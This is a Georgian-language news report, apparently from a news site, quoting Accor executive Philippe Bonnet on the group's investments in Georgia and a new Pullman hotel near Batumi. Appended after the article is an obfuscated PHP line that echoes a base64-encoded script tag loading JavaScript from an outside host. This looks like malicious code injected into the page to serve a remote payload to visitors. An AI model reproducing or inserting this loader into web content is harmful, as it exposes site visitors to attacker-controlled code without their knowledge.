celsiusi
ავერსი საქკაბელი

საქართველოში რამდენიმე მსხვილი ინვესტიცია უკვე განვახორციელეთ, ასევე, 15 ობიექტის გახსნას ვგეგმავთ, რომლებიც ამჟამად დაპროექტების ან მშენებლობის ეტაპებზეა. მიგვაჩნია, რომ საქართველოში საუკეთესო ბიზნეს გარემოა, რამაც ინვესტირება გადაგვაწყვეტინა - ის რეგიონში სტაბილურობით, მაღალი ეკონომიკური ზრდით და რაც მთავარია, ტურისტულ სექტორში ინვესტიციების მზარდი დინამიკით გამოირჩევა, - ამის შესახებ Accor-ის დეველოპმენტის რეგიონული ვიცე-პრეზიდენტმა, ფილიპ ბონემ განაცხადა, რომელიც აჭარის რეგიონში, ციხისძირში Accor-ის ჯგუფში შემავალი ხუთვარსკვლავიანი ბრენდის Pullman-ის ბრენდული სასტუმროსა და რეზიდენციების მშენებლობის კაფსულის ჩაგდების ცერემონიას დაესწრო.

ეკონომიკისა და მდგრადი განვითარების სამინისტროს ინფორმაციით, ფილიპ ბონეს შეფასებით, საქართველოს ტურისტულ სექტორში უცხოური ინვესტიციების შემოსვლას ხელს უწყობს მთავრობის თანმიმდევრული და წარმატებული პოლიტიკა, რომელიც, ერთი მხრივ, მიმართულია ტურისტული ბაზრების დივერსიფიკაციისკენ, მეორე მხრივ კი - ხელს უწყობს როგორც არსებული, ისე ახალი ტურისტული მიზიდულობის ცენტრების შექმნას.

„ჩვენთვისაც დიდი აღმოჩენა იყო ბათუმთან ახლოს ისეთი მშვენიერი რეკრეაციული ადგილის არსებობა, სადაც მთისა და ზღვის ჰაერი ასე ორგანულადაა ერთმანეთთან შერწყმული. ეს არის იდეალური ადგილი დასასვენებლად და მოხარული ვარ, რომ ასეთ გამორჩეულ პროექტში მონაწილეობის შესაძლებლობა მოგვეცა.

საქართველო Accor-ის ჯგუფის სტრატეგიული პარტნიორია. ჩვენ გვჯერა, რომ პროექტები, რომლებსაც თქვენს ქვეყანაში სამომავლოდ განვახორციელებთ, იქნება წარმატებული და ხელს შეუწყობს თქვენი ქვეყნის პოპულარიზებას და მეტ ცნობადობას ევროპის, ამერიკისა და სხვა მნიშვნელოვან ტურისტულ ბაზრებზე.

Accor-ი სტუმარმასპინძლობის სექტორის ყველაზე მსხვილი წარმომადგენელია ევროპაში და მოხარული ვართ, ვიყოთ თქვენი ქვეყნის პარტნიორები, განსაკუთრებით, პრემიუმ-კლასის ტურიზმის განვითარების პროცესში“, - აღნიშნა ფილიპ ბონემ, რომლის სიტყვასაც სამინისტროს პრესსამსახური ავრცელებს.

84
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");